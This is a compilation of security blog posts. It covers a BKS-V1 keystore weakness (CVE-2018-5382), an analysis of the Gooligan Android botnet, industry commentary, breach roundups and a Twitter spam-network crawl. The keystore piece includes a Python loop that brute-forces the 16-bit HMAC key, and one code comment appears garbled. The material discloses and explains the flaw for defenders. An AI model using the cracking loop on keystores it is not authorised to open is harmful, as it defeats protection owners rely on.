Wait, what is going on here? How can a single BKS file accept multiple passwords? As it turns out, there are two things going on:

First, when I optimized my BKS bruteforce script with the use of ProcessPoolExecutor, I didn't factor in how the script would behave when it is distributed across multiple processes. In the single-threaded instance above, the script exits as soon as it finds the password. However, when it's distributed across multiple processes using ProcessPoolExecutor, things are different. I didn't have any code to explicitly terminate the parent Python process or any of the forked Python processes. The impact of this is that my multi-process BKS cracking script will continue to make attempts after it finds the password.

The other thing that is happening is related to the BKS file format, which I discuss below.

Hashes and Collisions

When a resource is password-protected with a single password, it is extremely unlikely that another password can also be used to unlock the resource. Consider the simple case where a collision-resistant hash function is used to verify the password: Is this password unique?

Applying a cryptographic hash function to the password results in the following hashes:
MD5 (128-bit): 18fcfa801383d10dd0a1fea051674469
SHA-1 (160-bit): c9e2ef80e5f2afb8aef0d058182cc7f59e93e025
SHA-256 (256-bit): 08a6c455079687616e997c7bfd626ae754ba1a71b229db1b3a515cfa45e9d4ea
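The digest sizes behind these three hashes can be checked directly with Python's hashlib (the password string below is a placeholder, not the one hashed above):

```python
import hashlib

pw = b"example password"  # placeholder; not the article's password

print(hashlib.md5(pw).digest_size * 8)     # 128-bit digest
print(hashlib.sha1(pw).digest_size * 8)    # 160-bit digest
print(hashlib.sha256(pw).digest_size * 8)  # 256-bit digest
```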

The MD5 hash algorithm, which has a digest size of 128 bits, was shown in 1996 to be unsafe if a collision-resistant hash is required. By 2005, researchers produced a pair of PostScript documents and a pair of X.509 certificates where each pair shared the same MD5 hash. While it takes a bit of CPU processing power to find such collisions, it's feasible to do so with modern computing hardware.

The SHA-1 hash algorithm, which has a digest size of 160 bits, is more resistant to collisions than MD5. However by February 2017, the first known SHA-1 collision was produced. This attack required "the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations."

The SHA-256 hash algorithm, which has a digest size of 256 bits, is even more resistant to collisions than SHA-1. To date, no collisions have been found using the SHA-256 hashing algorithm.

BKS-V1 Files and Accidental Collisions

My naive BKS bruteforcing script produced three different passwords for the same BKS file. Let's look at the code for handling BKS files in pyjks:

hmac_fn = hashlib.sha1
hmac_digest_size = hmac_fn().digest_size
hmac_key_size = hmac_digest_size*8 if version != 1 else hmac_digest_size
hmac_key = rfc7292.derive_key(hmac_fn, rfc7292.PURPOSE_MAC_MATERIAL, store_password, salt, iteration_count, hmac_key_size//8)

Here we can see that the HMAC function is SHA-1, which isn't bad. However, it turns out that it's the HMAC key (and its size) that is important, since that's what determines whether the correct password has been provided to unlock the BKS keystore file. If the file is a BKS version 1 file, the hmac_key_size value will be the same as hmac_digest_size.

In the case of hashlib.sha1, the digest_size is 20 bytes (160 bits). But where it gets interesting is the derivation of hmac_key. The size of hmac_key is determined by hmac_key_size//8 (integer division, dropping any remainder). In this case, it's 20//8, which is 2 bytes (16 bits). Why is there integer division by 8 at all? It's not clear, but perhaps the developer confused where bits are used and bytes are used in the code.
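The arithmetic is easy to check. Reproducing the key-size calculation from the pyjks snippet above for both BKS versions:

```python
import hashlib

hmac_digest_size = hashlib.sha1().digest_size   # 20 bytes

# version != 1: the key size is expressed in bits, as intended
hmac_key_size_v2 = hmac_digest_size * 8         # 160
# version == 1: the same 20, but then treated as a bit count
hmac_key_size_v1 = hmac_digest_size             # 20

print(hmac_key_size_v2 // 8)  # 20 bytes of HMAC key material
print(hmac_key_size_v1 // 8)  # only 2 bytes (16 bits) for BKS-V1
```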

Let's add a debugging print() statement to the relevant component of pyjks and test our three different passwords for the same BKS keystore:

$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Redefinir senha')"
hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Activity started without extras')"
hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', '')"
hmac_key: c019

Here we can see that the hmac_key value is c019 (hex) with each of the three different passwords that are provided. In each of the three cases, the BKS-V1 keystore is decrypted, despite the likelihood that not one of the three accepted passwords was the one chosen by the software developer.

Why was I accidentally able to find BKS-V1 password collisions due to my shoddy Python programming skills? Because the maximum entropy you get from any BKS-V1 password is only 16 bits, which is nowhere near enough to represent a password. When it comes to password strength, entropy is a useful measure. Against pure bruteforce techniques, each case-sensitive Latin alphabet character adds about 5.7 bits of entropy, so a randomly chosen three-character, case-sensitive Latin alphabet password has about 17.1 bits of entropy, already exceeding what 16 bits can represent. In other words, while a developer can choose a reasonably strong password to protect the ~~contents~~ integrity of a BKS-V1 file, the file format itself only supports complexity equivalent to slightly less than a randomly selected case-sensitive three-letter password.
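The entropy figures above follow directly from log2:

```python
import math

bits_per_char = math.log2(52)        # case-sensitive Latin alphabet
print(round(bits_per_char, 1))       # 5.7 bits per character
print(round(3 * bits_per_char, 1))   # 17.1 bits for a random 3-char password
print(2 ** 16)                       # 65536: the entire BKS-V1 HMAC keyspace
```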

Cracking BKS-V1 Files

What amount of integrity protection does a 16-bit hmac_key provide? Virtually none. 16 bits can represent only 65,536 different values, which means that regardless of the password complexity the developer has chosen, a brute-force cracker needs to try at most 65,536 keys. A high-end GPU these days can crunch through over 10 billion SHA-1 operations per second.
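To illustrate just how small a 16-bit keyspace is, here is a hedged sketch of an exhaustive search over every possible 2-byte HMAC-SHA1 key (it does not parse real BKS files; the data and key below are made up for the example):

```python
import hashlib
import hmac

def brute_force_16bit_hmac_key(data: bytes, expected_mac: bytes):
    """Try all 65,536 possible 2-byte keys until the HMAC-SHA1 matches."""
    for k in range(2 ** 16):
        key = k.to_bytes(2, "big")
        if hmac.new(key, data, hashlib.sha1).digest() == expected_mac:
            return key
    return None

# Demo with a made-up key: the search recovers it almost instantly.
secret_key = bytes.fromhex("c019")
data = b"keystore contents"
mac = hmac.new(secret_key, data, hashlib.sha1).digest()
print(brute_force_16bit_hmac_key(data, mac).hex())  # c019
```

Even this naive single-threaded loop completes in well under a second on commodity hardware.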

As it turns out, John the Ripper does have BKS file support, despite what my earlier web searches suggested. While there isn't currently GPU support for cracking BKS files, a CPU is plenty fast. My limited testing has shown that any BKS-V1 file can be cracked in about 10 seconds or less using just a single CPU core on a modern system.

Conclusion and Recommendations

Without a doubt, BKS-V1 keystore files are insecure due to insufficient HMAC key size. Although BKS files support password protection for the integrity of their contents, the protection supplied by version 1 of the file format is nearly zero. For these reasons, here are recommendations for developers who use Bouncy Castle:

  • Be sure to use Bouncy Castle version 1.47 or newer. This version, introduced on March 30, 2012, increases the default HMAC key size of a BKS keystore from 2 bytes to 20 bytes.

    This information has been in the release notes for Bouncy Castle for about six years, but it may have been overlooked because no CVE identifier was assigned to this weakness. Approximately 84% of the BKS files seen in Android applications are using the vulnerable version 1. We assigned CVE-2018-5382 to this issue to help ensure that it gets the attention it deserves.
  • On modern Bouncy Castle versions, do not use the "BKS-V1" format, which was added for legacy compatibility with Bouncy Castle version 1.46 and earlier.
  • If you rely on the password protection provided by BKS-V1 to protect private key material, those private keys should be considered compromised. Such keys should be regenerated and stored in a keystore that provides adequate protection against brute-force attacks, along with a sufficiently long and complex password. For BKS files that contain only public information, such as certificates, the weak password protection provided by version 1 of the format does not matter.

For more details, please see CERT Vulnerability Note VU#306792.

The NIS Directive – just how tough is it really?

Over the last few months, UK media outlets have been filled with reports about the series of tough new measures being introduced on 9th May to protect our national critical infrastructure against cyber threats. In January, the government confirmed that UK critical infrastructure organisations may soon be liable for fines of up to £17m if they fail to implement robust cyber security measures, under its plans to implement the EU’s Network and Information Systems (NIS) Directive. But despite the tough talk, are the current proposals as rigorous as they sound?

In January, the government published its plans to implement the NIS Directive into UK law, following a public consultation. But despite the punitive penalty system, the response avoided making any hard recommendations and instead relies on a high-level “appropriate and proportionate technical and organisational measures” approach, deferring responsibility to the National Cyber Security Centre (NCSC) and the Competent Authorities. Looking at the NCSC guidance, the measures it outlines are heavily weighted toward reactive attack reporting rather than advising organisations on how to better shore up their perimeter with proactive defence solutions. As an example, within the guidance organisations are asked to define their own risk profile, and then prove their resiliency against that profile – the equivalent of being graded on a test you wrote yourself.

In this light, it’s unclear how the opportunity to set out a framework of minimum standards for CNI can be effectively achieved with the NIS Regulations. If the intended outcome is genuinely tied to resilience against cyber-attacks, then these essential services should be required to remain available during all but the most extreme cyber-attacks. The outcome described in the guidance points to merely the proper disclosure of failed protection and the swift recovery from that failure. My concern remains that implementation of the NIS Directive will be viewed as a mere “tick box” exercise which requires the bare minimum to be done, rather than allowing the UK to set world-leading standards in this area.

As a UK citizen, I fear that our government is failing to deliver on the promises outlined in its Digital Strategy, which pledged to make the UK “the safest place in the world to live and work online.” This is all deeply concerning, especially given that Ciaran Martin, the head of the NCSC, warned in January that it was a matter of “when, not if” the UK faces a major cyber-attack that might cripple infrastructure such as energy supplies or the financial services sector. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats which are often believed to be the work of foreign governments seeking to cause political upheaval. Last year’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity for cyber-attacks to impact people’s access to essential services. Only this month, we have seen a surge in record-breaking DDoS attacks that exploit the Memcached vulnerability.

As the draft NIS Regulations become UK law, we have a golden opportunity to improve the UK’s cyber security posture. Let’s hope we can still seize this moment and build an ecosystem that genuinely protects our critical infrastructure against today’s cyber-attacks.

These Best Practices Will Stop 90% Of The Cyber Threat

The leadership of our consultancy Crucial Point has been working to enhance security postures and mitigate cyber risks for over a decade, successfully operating across multiple sectors of the economy to help leaders thwart dynamic adversaries. In doing so, we have found that most businesses can take steps to raise their defenses before calling in the experts.

The nine steps below, taken from the Crucial Point Best Cybersecurity Practices page, can help kickstart the defense of any firm.

These steps are:

  1. Use a “framework” that will guide your action. Our favorite one is the NIST Cybersecurity Framework, but there are many. This framework will help guide your policies, procedures, contracting and incident response.
  2. Work to know the threat. Knowing the cyber threat will help you more rapidly and economically adjust your defenses. We wrote a book to help you do this. Find it at: The Cyber Threat
  3. Think of your nightmare scenarios. Only you know your business, and only you can really know what could go wrong if the worst happens. Use these nightmare scenarios to help determine what your most important data is; this will help prioritize your defensive actions.
  4. Ensure you and your team are patching operating systems and applications. This sounds so basic, and it is so basic. But it is too frequently overlooked and it gets companies hacked, again and again. So don’t just assume it is going on. Check it.
  5. Put multi-factor authentication in place for every employee. Depending on your business model, you may need to do this for customers and suppliers too. This is very important for a good defense.
  6. Block malicious code. This is easier said than done, but work to put a strategy in place that ensures only approved applications can be installed in your enterprise, and, even though anti-virus solutions are not comprehensive, ensure you have them in place and keep them up to date.
  7. Design to detect and respond to breach. This means put monitoring in place and also use proper segmentation of your systems so an adversary has a harder time moving around.
  8. Encrypt your data. And back it up!
  9. Prepare for the worst. Know what your incident response plan is and make sure it is well documented and reviewed. Ensure it includes notification procedures.

Those are just the first few steps, but please put them in place! By following community best practices you can make an immediate difference in your own security posture. These are, for the most part, things you can do yourself at very little cost.

To accelerate your implementation of these best practices, or to independently verify and validate your security posture and receive detailed action plans for improvement, contact Crucial Point here and ask about our CISO-as-a-Service offering.

The post These Best Practices Will Stop 90% Of The Cyber Threat appeared first on The Cyber Threat.

10 Tips to Improve Employee Cyber Security Compliance

Proactive Steps to Promote Employee Cyber Security Compliance Your organization’s people are your first line of defense against cyber criminals. Unfortunately, they’re also your weakest link. Insiders pose the biggest threat to cyber security in the healthcare industry, and only 13% of public sector employees “take personal responsibility for cyber security.” Here are 10 proactive… Read More


Employees Are Biggest Threat to Healthcare Data Security

Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security

Healthcare data security is under attack from the inside. While insider threats – due to employee error, carelessness, or malicious intent – are a problem in every industry, they are a particular pox on healthcare data security. Two recent reports illustrate the gravity of the situation.


Verizon’s 2018 Protected Health Information Data Breach Report, which examined 1,368 healthcare data security incidents in 27 countries (heavily weighted towards the U.S.), found that:

  • 58% of protected health information (PHI) security incidents involved internal actors, making healthcare the only industry where internal actors represent the biggest threat to their organizations.
  • About half of these incidents were due to error or carelessness; the other half were committed with malicious intent.
  • Financial gain was the biggest driver behind intentional misuse of PHI, accounting for 48% of incidents. Unauthorized snooping into the PHI of acquaintances, family members, or celebrities out of curiosity or for “fun” was second (31%).
  • Over 80% of the time, insiders who intentionally misused PHI didn’t “hack” anything; they simply used their existing credentials or physical access to hardware (such as access to a laptop containing PHI).
  • 21% of PHI security incidents involved lost or stolen laptops containing unencrypted data.
  • In addition to PHI breaches, ransomware continues to plague healthcare data security; 70% of incidents involving malicious code were ransomware attacks.

Meanwhile, a separate survey on healthcare data security conducted by Accenture found that nearly one in five healthcare employees would be willing to sell confidential patient data to a third party, and they would do so for as little as $500 to $1,000. Even worse, nearly one-quarter reported knowing “someone in their organization who has sold their credentials or access to an unauthorized outsider.”

Combating Insider Threats to Healthcare Data Security

Healthcare data security is especially tricky because numerous care providers require immediate and unrestricted access to patient information to do their jobs. Any hiccups along the way could result in a dead or maimed patient. However, there are proactive steps healthcare organizations can take to combat insider threats:

  • Establish written acceptable use policies clearly outlining who is allowed to access patient health data and when, and the consequences of accessing PHI without a legitimate reason.
  • Back up these policies with routine monitoring for unusual or unauthorized user behavior; always know who is accessing patient records.
  • Restrict system access as appropriate, and review user access levels on a regular basis.
  • Don’t forget to address the physical security of hardware, such as laptops.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Taking down Gooligan: part 2 — inner workings

This post provides an in-depth analysis of the inner workings of Gooligan, the infamous Android OAuth stealing botnet.

This is the second post of a series dedicated to the hunt for and takedown of Gooligan that we did at Google, in collaboration with Check Point, in November 2016. The first post recounts Gooligan’s origin story and provides an overview of how it works. The final post discusses Gooligan’s various monetization schemes and its takedown. As this post builds on the previous one, I encourage you to read it if you haven’t done so already.

This series of posts is modeled after the talk I gave at Botconf in December 2017. Here is a re-recording of the talk:

You can also get the slides here but they are pretty bare.


Initially, users are tricked into installing Gooligan’s staging app on their device under one false pretense or another. Once this app is executed, it will fully compromise the device by performing the five steps outlined in the diagram below:

Gooligan infection process

As emphasized in the chart above, the first four stages are mostly borrowed from Ghost Push. The Gooligan authors’ main addition is the code needed to instrument the Play Store app via a complex injection process. This heavy code reuse initially made it difficult for us to separate Ghost Push samples from Gooligan ones. However, as soon as we had the full kill chain analyzed, we were able to write accurate detection signatures.

Payload decoding

Most Gooligan samples hide their malicious payload in a fake image located in assets/close.png. This file is encrypted with a hardcoded XOR function. The encryption is there to evade the signatures that detect the code Gooligan borrows from previous malware. Encrypting a malicious payload is a very old malware trick that Android malware has used since at least 2011.
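For reference, repeating-key XOR decryption looks like this (a generic sketch; Gooligan’s actual hardcoded key is not reproduced here, and the key below is made up):

```python
def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the same function both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# XOR is its own inverse, so applying it twice recovers the plaintext.
ciphertext = xor_decrypt(b"payload", b"\x42\x13")
print(xor_decrypt(ciphertext, b"\x42\x13"))  # b'payload'
```

This is trivially reversible once the key is extracted from the binary, which is why it only defeats naive signature matching, not analysis.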

Gooligan initial payload file structure

Besides its encryption function, one of the most prominent Gooligan quirks is its weird (and poor) integrity verification algorithm. Basically, the integrity of the close.png file is checked by ensuring that the first ten bytes match the last ten. As illustrated in the diagram above, the oddest part of this scheme is that the first five bytes (val 1) are compared with the last five, while bytes six through ten (val 2) are compared with the first five.
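Reconstructed from that description, the check amounts to something like the following (an illustrative sketch based solely on the prose above, not Gooligan’s actual code):

```python
def check_payload_integrity(data: bytes) -> bool:
    """Sketch of the odd BKS... er, close.png integrity check described above."""
    val1 = data[0:5]       # first five bytes
    val2 = data[5:10]      # bytes six through ten
    last_ten = data[-10:]
    # Oddly, val1 is compared against the LAST five bytes of the file,
    # while val2 is compared against the FIRST five.
    return val1 == last_ten[5:] and val2 == data[0:5]
```

Note that under this scheme val2 is effectively required to equal val1, so the check passes for many files whose first and last ten bytes do not actually match byte-for-byte.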

Phone rooting


As alluded to earlier, Gooligan, like Snappea and Ghost Push, weaponizes the Kingroot exploit kit to gain root access. Kingroot operates in three stages: First, the malware gathers information about the phone and sends it to the exploit server. Next, the server looks up its database of exploits (which only affect Android 3.x and 4.x) and builds a payload tailored to the device. Finally, upon receiving the payload, the malware runs it to gain root access.

The weaponization of known exploits by cyber-criminals who lack exploit development capacity (or don't want to invest in it) is as old as crimeware itself. For example, DroidDream exploited Exploid and RageAgainstTheCage back in 2011. This pattern is common across every platform. For example, the leaked NSA exploit EternalBlue was recently weaponized by the fake ransomware NotPetya. If you are interested in ransomware actors, check my posts on the subject.

Persistence setup

Upon rooting the device, Gooligan patches the recovery script to ensure that it survives a factory reset. This resilience mechanism was the most problematic aspect of Gooligan from a remediation perspective, because for the oldest devices it left us with an OTA (over-the-air) update or device re-flashing as the only ways to remove it. This is because very old devices lack verified boot, which was introduced in Android 4.4.

Android recovery

This difficult context, combined with the urgent need to help our users, led us to resort to a strategy that we rarely use: a coordinated takedown. The goal of this takedown was to disable key elements of the Gooligan infrastructure in a way that would ensure that the malware would be unable to work or update. As discussed in depth at the end of the post, we were able to isolate and take down Gooligan’s core server in less than a week thanks to a wide cross-industry effort. In particular, Kjell from the NorCert worked around the clock with us during the Thanksgiving holidays (thanks for all the help, Kjell!).

Play store app manipulation

The final step of the infection is the injection of a shared library into the Play Store app. This shared library allows Gooligan to manipulate the Play Store app to download apps and inject reviews.

We traced the injection code back to publicly shared code. The library itself is very bare: the authors added only the code needed to call Play Store functions. All the fraud logic lives in the main app, probably because the authors are more familiar with Java than C.

Impacted devices


Geo distribution of devices impacted by Gooligan

Looking at the set of devices infected during the takedown revealed that most of the affected devices were from India, Latin America, and Asia, as visible in the map above. 19% of the infections were from India, and the top eight countries affected by Gooligan accounted for more than 50% of the infections.


Phone maker distribution for devices impacted by Gooligan

In terms of devices, as shown in the bar chart above, the infections are spread across all the big brands, with Samsung and Micromax unsurprisingly the most affected given their market share. Micromax, the leading Indian phone maker, is not well known in the U.S. and Europe because it has no presence there. It started manufacturing Android One devices in 2014 and sells in quite a few countries besides India, most notably Russia.


Initial clue

Gooligan HAproxy configuration

Buried deep inside Gooligan patient zero’s code, Check Point researchers Andrey Polkovnichenko, Yoav Flint Rosenfeld, and Feixiang He, who worked with us during the escalation, found the very unusual text string oversea_adjust_read_redis. This string led to the discovery of a Chinese blog post discussing load-balancer configuration, which in turn led to the full configuration file of Gooligan’s backend services.

#Ads API
        acl is_ads path_beg /overseaads/
        use_backend overseaads if is_ads

#Payment API
        acl is_paystatis path_beg /overseapay/admin/
        use_backend overseapaystatis if is_paystatis

# Play install
        acl is_appstore path_beg /appstore/
        use_backend overseapaystatis if is_appstore

Analyzing the exposed HAproxy configuration allowed us to pinpoint where the infrastructure was located and how the backend services were structured. As shown in the annotated configuration snippet above, the backend had APIs for click fraud, for receiving payments from clients, and for Play Store abuse. While not visible above, there was also a complex admin- and statistics-related API.


Gooligan infrastructure

Combining the API endpoints and IPs exposed in the HAproxy configuration with our knowledge of the Gooligan binary allowed us to reconstruct the infrastructure charted above. Overall, Gooligan was split across two main data centers: one in China and one overseas in the US, using Amazon AWS IPs. After the takedown, all the infrastructure moved back to China.

Note: in the diagram above, the Fraud endpoint appears twice. This is not a mistake: at Gooligan’s peak, its authors split it out to sustain the load and better distribute the requests.


So, who is behind Gooligan? Based on this infrastructure analysis and other data, we strongly believe that it is a group operating from mainland China. Publicly, the group claims to be a marketing company, while under the hood it is mostly focused on running various fraudulent schemes. The apparent authenticity of its front explains why some reputable companies ended up being scammed by this group. Bottom line: be careful whom you buy ads from or install from: if it is too good to be true...

In the final post of the series, I discuss Gooligan’s various monetization schemes and its takedown. See you there!

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter, Facebook, Google+, or LinkedIn. You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS.

A bientôt!

Weekly Cyber Risk Roundup: Russia Sanctions, Mossack Fonseca Shutdown, Equifax Insider Trading

On Thursday, the U.S. government imposed sanctions against five entities and 19 individuals for their role in “destabilizing activities” ranging from interfering in the 2016 U.S. presidential election to carrying out destructive cyber-attacks such as NotPetya, an event that the Treasury department said is the most destructive and costly cyber-attack in history.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” said Treasury Secretary Steven T. Mnuchin in a press release. “Treasury intends to impose additional CAATSA [Countering America’s Adversaries Through Sanctions Act] sanctions, informed by our intelligence community, to hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the U.S. financial system.”

Nine of the 24 entities and individuals named on Thursday had already received previous sanctions from either President Obama or President Trump for unrelated reasons, The New York Times reported.

In addition to the sanctions, the Department of Homeland Security and the FBI issued a joint alert warning that the Russian government is targeting government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

According to the alert, Russian government cyber actors targeted small commercial facilities’ networks with a multi-stage intrusion campaign that staged malware, conducted spear phishing attacks, and gained remote access into energy sector networks. The actors then used their access to conduct network reconnaissance, move laterally, and collect information pertaining to Industrial Control Systems.


Other trending cybercrime events from the week include:

  • Sensitive data exposed: Researchers discovered a publicly accessible Amazon S3 bucket belonging to the Chicago-based jewelry company MBM Company Inc. that exposed the personal information of more than 1.3 million people. About 3,000 South Carolina recipients of the Palmetto Fellows scholarship had their personal information exposed online for over a year due to a glitch when switching programs. The Dutch Data Protection Authority accidentally leaked the names of some of its employees due to not removing metadata from more than 800 public documents.
  • State data breach notifications: ABM Industries is notifying clients of a phishing incident that may have compromised their personal information. Chopra Enterprises is notifying customers that payment cards used on its ecommerce site may have been compromised. Neil D. DiLorenzo CPA is notifying clients of unauthorized access to a system that contained files related to tax returns, and several clients have reported fraudulent activity related to their tax returns. NetCredit is warning a small percentage of customers that an unauthorized party used their credentials to access their accounts.
  • Other data breaches: A misconfiguration at Florida Virtual School led to the personal information of 368,000 students, as well as thousands of former and current Leon County Schools employees, being compromised. Okaloosa County Water and Sewer said that individuals may have had their payment card information stolen due to a breach involving external vendors that process credit and debit card payments. The Nampa School District said that an email account compromise may have exposed the personal information of 3,983 current and past employees. A cyber-attack at the Port of Longview may have exposed the personal information of 370 current and former employees as well as 47 vendors.
  • Arrests and legal actions: A Maryland man was sentenced to 12 years in prison for his role in a multi-million-dollar identity theft scheme that claimed fraudulent tax refunds over a seven-year period. The owner of Smokin’ Joe’s BBQ in Missouri has been charged with various counts related to the use of stolen credit cards. Svitzer said that 500 employees were impacted by the discovery that three employee email accounts in finance, payroll, and operations had been auto-forwarding emails outside of the company for nearly 11 months without the company’s knowledge.
  • Other notable events: Up to 450 people who filed reports with Gwent Police over a two-year period had their data exposed due to security flaws in the online tool, and those people were never notified that their data may have been compromised. A security flaw on a Luxembourg public radio station may have exposed non-public information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

Two of the largest data breaches in recent memory were back in the news this week, with Mossack Fonseca announcing that it is shutting down following the fallout from the Panama Papers breach and a former Equifax employee being charged with insider trading related to the company’s massive breach.

Documents stolen from the Panamanian law firm Mossack Fonseca and leaked to the media in April 2016 were at the center of the scandal known as the Panama Papers, which largely revealed how rich individuals around the world were able to evade taxes in various countries.

“The reputational deterioration, the media campaign, the financial circus and the unusual actions by certain Panamanian authorities, have occasioned an irreversible damage that necessitates the obligatory ceasing of public operations at the end of the current month,” Mossack Fonseca wrote in a statement.

While Mossack Fonseca’s data breach appears to have finally led to the organization shutting down, Equifax’s massive breach announcement in September 2017 has since sparked a variety of regulatory questions, as well as criticism of the company’s leadership and allegations of insider trading.

Last week the SEC filed a complaint alleging that Jun Ying, who was next in line to be the company’s global CIO, engaged in insider trading: he used confidential information entrusted to him by the company to conclude that Equifax had suffered a serious breach, then exercised all of his vested Equifax stock options and sold the shares in the days before the breach was publicly disclosed.

“According to the complaint, by selling before public disclosure of the data breach, Ying avoided more than $117,000 in losses,” the SEC wrote in a press release.

Ying also faces criminal charges from the U.S. Attorney’s Office for the Northern District of Georgia.

Good To Be Back – Paul’s Security Weekly #551

This week, Patrick Laverty of Rapid7 joins us for an interview! Dick Wilkins of Phoenix Technologies joins us for our second feature interview! In the news, we have updates from Flash, Pwn2Own, VMware, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Google’s new Gaming Venture: A New Player?

Google in Gaming – Facts and Speculation In January 2018, game industry veteran Phil Harrison announced that he was joining Google as a Vice President and GM. With Harrison’s long history of involvement with video game companies – having previously worked with Sony and Microsoft’s Xbox division – this immediately prompted speculation and rumours about […]

Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:

This particular avatar was very commonly used as a profile picture in these accounts.

All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:

  • Check out
  • Check this
  • How do you like my site
  • How do you like me
  • You love it harshly
  • Do you like fast
  • Do you like it gently
  • Come to my site
  • Come in
  • Come on
  • Come to me
  • I want you
  • You want me
  • Your favorite
  • Waiting you
  • Waiting you at

All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:


It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:

“I will ban drugs, spam, porn, etc.” Yeah, right.

My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.

Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.

The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.
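The crawler logic can be sketched as a throttled breadth-first search (a simplified illustration; `fetch_connections` and `looks_suspicious` stand in for the real Twitter API calls and trait heuristics, which are assumptions here):

```python
import time
from collections import deque

def crawl(seeds, fetch_connections, looks_suspicious, delay=1.0):
    """Breadth-first crawl: every newly discovered account showing the
    same traits is queued, and each round of API calls is throttled
    to stay within rate limits."""
    seen = set(seeds)
    queue = deque(seeds)
    edges = []                      # (account, connection) pairs for the graph
    while queue:
        account = queue.popleft()
        for other in fetch_connections(account):   # friends + followers
            edges.append((account, other))
            if other not in seen and looks_suspicious(other):
                seen.add(other)
                queue.append(other)
        time.sleep(delay)           # throttle to respect the API rate limit
    return seen, edges
```

The recorded edges are what make it possible to plot the follower/following graph shown below; the throttling is why crawling 3,000 accounts took days.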

My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.

The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.

After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.

Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Only a few of the clusters weren’t “flower” shaped. Here are a few zoomed-in views of the graph.


Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:

Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.

One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:

As you can see, this group contains fewer new accounts than older ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason there are fewer new accounts in this network is that Twitter’s automation seems able to flag suspicious behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts in the graphs above were restricted or suspended.
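
A breakdown like this can be produced by bucketing each account's `created_at` timestamp into whole years of age. A minimal sketch (assuming the timestamps have already been parsed from the API response into `datetime` objects):

```python
from collections import Counter
from datetime import datetime, timezone

def age_histogram(created_at_list, now=None):
    """Count accounts by whole years of age at time `now`."""
    now = now or datetime.now(timezone.utc)
    ages = Counter()
    for created in created_at_list:
        years = (now - created).days // 365  # coarse: ignores leap-day drift
        ages[years] += 1
    return dict(sorted(ages.items()))
```

The same bucketing works for the tweet, like, follower, and following counts shown below, just keyed on a different field.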

Here are a few more breakdowns – Tweets published, likes, followers and following.

Here’s a collage of some of the profile pictures found. I modified a Python script to generate this – far better than using one of those “free” collage-making tools available on the Internets. 🙂
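
The tiling itself is only a few lines with Pillow. This is a minimal sketch of the approach, not the exact script used here:

```python
from PIL import Image  # Pillow; assumed available

def make_collage(images, tile_size=48, columns=20):
    """Tile avatar thumbnails into a single grid image, row by row."""
    rows = (len(images) + columns - 1) // columns
    collage = Image.new("RGB", (columns * tile_size, rows * tile_size))
    for index, img in enumerate(images):
        thumb = img.convert("RGB").resize((tile_size, tile_size))
        x = (index % columns) * tile_size
        y = (index // columns) * tile_size
        collage.paste(thumb, (x, y))
    return collage
```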

So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:

